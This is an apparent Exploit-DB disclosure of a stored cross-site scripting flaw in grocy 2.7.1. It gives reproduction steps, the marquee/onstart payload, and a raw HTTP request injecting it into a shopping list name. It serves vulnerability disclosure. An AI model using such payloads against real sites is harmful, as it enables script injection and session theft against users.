grocy 2.7.1 – Persistent Cross-Site Scripting

• Exploit Database
• 42 阅读

• 作者： Mufaddal Masalawala
  日期： 2020-09-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/48792/

• # Exploit Title: grocy 2.7.1 - Persistent Cross-Site Scripting
  # Date: 2020-09-06
  # Exploit Author: Mufaddal Masalawala
  # Vendor Homepage: https://berrnd.de/
  # Software Link: https://github.com/grocy/grocy
  # Version: 2.7.1
  # Tested on: Kali Linux 2020.3
  
  # Proof Of Concept:
  
  grocy household management solution v2.7.1, allows stored XSS and HTML
  Injection, via Create Shopping List module, that is rendered upon
  deletiing that Shopping List.
  To exploit this vulnerability:
  1. Login to the application
  2. Go to 'Shooping List' module
  3. Click on 'New Shopping List' module
  4. Enter the payload: <marquee onstart=alert(document.cookie)> in 'Name'
  input field.
  5. Click Save
  6. Click 'Delete Shopping List'
  
  *#REQUEST -->*
  POST /api/objects/shopping_lists HTTP/1.1
  Host: 127.0.0.1
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101
  Firefox/68.0
  Accept: */*
  Accept-Language: en-US,en;q=0.5
  Accept-Encoding: gzip, deflate
  Referer: http://127.0.0.1/shoppinglist/new
  Content-type: application/json
  Content-Length: 38
  Connection: close
  Cookie: grocy_session=GhIjKZyST7Qkx18Q97u9MaPM1LsMtBmcJ6I59gxTO3Ks4WJXUd
  {"name":"<marquee onstart=alert(1)> "}
  *#RESPONSE -->*
  HTTP/1.1 200 OK
  Server: nginx/1.18.0
  Date: Sun, 06 Sep 2020 12:53:13 GMT
  Content-Type: application/json
  Connection: close
  X-Powered-By: PHP/7.3.21
  Content-Length: 26
  
  {"created_object_id":"21"}
  
  
  Regards,
  Mufaddal M